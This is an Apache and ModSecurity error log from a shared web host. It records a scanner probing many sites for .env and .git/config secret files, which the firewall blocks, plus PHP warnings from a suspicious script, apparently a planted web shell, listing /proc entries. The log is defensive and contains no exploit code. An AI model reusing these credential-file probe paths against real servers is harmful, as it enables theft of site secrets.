[Mon May 11 20:48:01.068237 2026] [security2:error] [pid 1501831:tid 1501837] [client 213.209.159.113:57058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agIkYVNddpkriGUb6ZVz4QAAAQQ"]
[Mon May 11 20:48:16.172749 2026] [security2:error] [pid 1516058:tid 1516106] [client 43.134.177.47:54488] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/comments/feed/"] [unique_id "agIkcCMeXtzav-mi9SyuaQAAANA"]
PHP Warning:  filesize(): stat failed for /proc/295/task/295/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/295/task/295/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/295/task/295/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/295/task/295/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/295/task/295/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/295/task/295/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:49:17.775264 2026] [:error] [pid 1511173:tid 1511191] [client 67.205.164.255:53831] File does not exist: /home/apoefr/public_html/xmlrpc.php
[Mon May 11 20:49:26.722344 2026] [security2:error] [pid 1534836:tid 1534871] [client 43.134.98.88:51694] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agIktteaRXe5lR8y0ZOQwAAAAUE"]
[Mon May 11 20:49:31.801693 2026] [autoindex:error] [pid 1516058:tid 1516101] [client 195.114.15.48:56824] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 20:49:32.225496 2026] [:error] [pid 1516058:tid 1516101] [client 195.114.15.48:56824] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:36.455458 2026] [:error] [pid 1516058:tid 1516101] [client 195.114.15.48:56824] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:36.840895 2026] [:error] [pid 1516058:tid 1516101] [client 195.114.15.48:56824] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:36.842458 2026] [:error] [pid 1501831:tid 1501847] [client 195.114.15.48:54164] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:36.842718 2026] [:error] [pid 1502013:tid 1502030] [client 195.114.15.48:54156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:36.881343 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:37.457661 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:37.778780 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:38.115376 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:38.439023 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:38.877507 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:39.218466 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:39.548825 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:39.902320 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:40.672768 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:41.335534 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:41.748286 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:42.390212 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:42.956714 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:43.359440 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:43.715974 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:44.568119 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:44.873965 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.291366 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.748258 2026] [:error] [pid 1501883:tid 1501893] [client 195.114.15.48:54170] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.780649 2026] [security2:error] [pid 1534836:tid 1534882] [client 195.114.15.48:54252] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.bak"] [unique_id "agIkydeaRXe5lR8y0ZORBAAAAUs"]
[Mon May 11 20:49:45.780822 2026] [:error] [pid 1511173:tid 1511189] [client 195.114.15.48:54180] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.780952 2026] [:error] [pid 1501831:tid 1501854] [client 195.114.15.48:54236] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.781062 2026] [security2:error] [pid 1534836:tid 1534882] [client 195.114.15.48:54252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.bak"] [unique_id "agIkydeaRXe5lR8y0ZORBAAAAUs"]
[Mon May 11 20:49:45.780969 2026] [:error] [pid 1502013:tid 1502044] [client 195.114.15.48:54198] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.781301 2026] [security2:error] [pid 1516058:tid 1516110] [client 195.114.15.48:54176] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.git/config"] [unique_id "agIkySMeXtzav-mi9SyvPQAAANQ"]
[Mon May 11 20:49:45.781392 2026] [security2:error] [pid 1534836:tid 1534881] [client 195.114.15.48:54268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.old"] [unique_id "agIkydeaRXe5lR8y0ZORAwAAAUo"]
[Mon May 11 20:49:45.781471 2026] [security2:error] [pid 1516058:tid 1516110] [client 195.114.15.48:54176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.git/config"] [unique_id "agIkySMeXtzav-mi9SyvPQAAANQ"]
[Mon May 11 20:49:45.781551 2026] [security2:error] [pid 1534836:tid 1534881] [client 195.114.15.48:54268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.old"] [unique_id "agIkydeaRXe5lR8y0ZORAwAAAUo"]
[Mon May 11 20:49:45.781778 2026] [security2:error] [pid 1534836:tid 1534881] [client 195.114.15.48:54268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkydeaRXe5lR8y0ZORAwAAAUo"]
[Mon May 11 20:49:45.782018 2026] [security2:error] [pid 1534836:tid 1534882] [client 195.114.15.48:54252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkydeaRXe5lR8y0ZORBAAAAUs"]
[Mon May 11 20:49:45.783119 2026] [security2:error] [pid 1516058:tid 1516110] [client 195.114.15.48:54176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkySMeXtzav-mi9SyvPQAAANQ"]
[Mon May 11 20:49:45.783363 2026] [security2:error] [pid 1534836:tid 1534876] [client 195.114.15.48:54422] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/public/.env"] [unique_id "agIkydeaRXe5lR8y0ZORBQAAAUU"]
[Mon May 11 20:49:45.783594 2026] [security2:error] [pid 1501831:tid 1501835] [client 195.114.15.48:54408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/backend/.env"] [unique_id "agIkyVNddpkriGUb6ZV0rAAAAQI"]
[Mon May 11 20:49:45.783724 2026] [security2:error] [pid 1502013:tid 1502035] [client 195.114.15.48:54416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agIkyZYn-x0CHsbEbP2rLAAAAIY"]
[Mon May 11 20:49:45.783729 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.114.15.48:54282] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agIkyfjVc-A-CSptvm1vhAAAAFE"]
[Mon May 11 20:49:45.783807 2026] [security2:error] [pid 1501831:tid 1501835] [client 195.114.15.48:54408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/backend/.env"] [unique_id "agIkyVNddpkriGUb6ZV0rAAAAQI"]
[Mon May 11 20:49:45.783890 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.114.15.48:54282] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env"] [unique_id "agIkyfjVc-A-CSptvm1vhAAAAFE"]
[Mon May 11 20:49:45.784068 2026] [:error] [pid 1516058:tid 1516114] [client 195.114.15.48:54434] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.784331 2026] [security2:error] [pid 1534836:tid 1534876] [client 195.114.15.48:54422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/public/.env"] [unique_id "agIkydeaRXe5lR8y0ZORBQAAAUU"]
[Mon May 11 20:49:45.785461 2026] [security2:error] [pid 1502013:tid 1502035] [client 195.114.15.48:54416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/app/.env"] [unique_id "agIkyZYn-x0CHsbEbP2rLAAAAIY"]
[Mon May 11 20:49:45.785880 2026] [security2:error] [pid 1501831:tid 1501835] [client 195.114.15.48:54408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyVNddpkriGUb6ZV0rAAAAQI"]
[Mon May 11 20:49:45.786567 2026] [:error] [pid 1501883:tid 1501885] [client 195.114.15.48:54178] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.786610 2026] [security2:error] [pid 1534836:tid 1534876] [client 195.114.15.48:54422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkydeaRXe5lR8y0ZORBQAAAUU"]
[Mon May 11 20:49:45.786614 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.114.15.48:54376] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.backup"] [unique_id "agIkydeaRXe5lR8y0ZORBgAAAVM"]
[Mon May 11 20:49:45.786901 2026] [security2:error] [pid 1502013:tid 1502035] [client 195.114.15.48:54416] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyZYn-x0CHsbEbP2rLAAAAIY"]
[Mon May 11 20:49:45.786761 2026] [:error] [pid 1516058:tid 1516096] [client 195.114.15.48:54378] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.787118 2026] [security2:error] [pid 1516058:tid 1516094] [client 195.114.15.48:54272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.staging"] [unique_id "agIkySMeXtzav-mi9SyvQAAAAMQ"]
[Mon May 11 20:49:45.787163 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.114.15.48:54376] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.backup"] [unique_id "agIkydeaRXe5lR8y0ZORBgAAAVM"]
[Mon May 11 20:49:45.787209 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.114.15.48:54282] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "totalcloud.fr"] [uri "/403.shtml"] [unique_id "agIkyfjVc-A-CSptvm1vhAAAAFE"]
[Mon May 11 20:49:45.787069 2026] [:error] [pid 1501883:tid 1501899] [client 195.114.15.48:54444] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.787334 2026] [security2:error] [pid 1516058:tid 1516094] [client 195.114.15.48:54272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/.env.staging"] [unique_id "agIkySMeXtzav-mi9SyvQAAAAMQ"]
[Mon May 11 20:49:45.787138 2026] [:error] [pid 1511173:tid 1511179] [client 195.114.15.48:54436] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:49:45.787427 2026] [security2:error] [pid 1501883:tid 1501908] [client 195.114.15.48:54394] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agIkyTP5Q_-MBliRCAxlGgAAABc"]
[Mon May 11 20:49:45.787948 2026] [security2:error] [pid 1501883:tid 1501908] [client 195.114.15.48:54394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "totalcloud.fr"] [uri "/api/.env"] [unique_id "agIkyTP5Q_-MBliRCAxlGgAAABc"]
[Mon May 11 20:49:45.788005 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.114.15.48:54368] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "totalcloud.fr"] [uri "/.env.development"] [unique_id "agIkyTP5Q_-MBliRCAxlHAAAABY"]
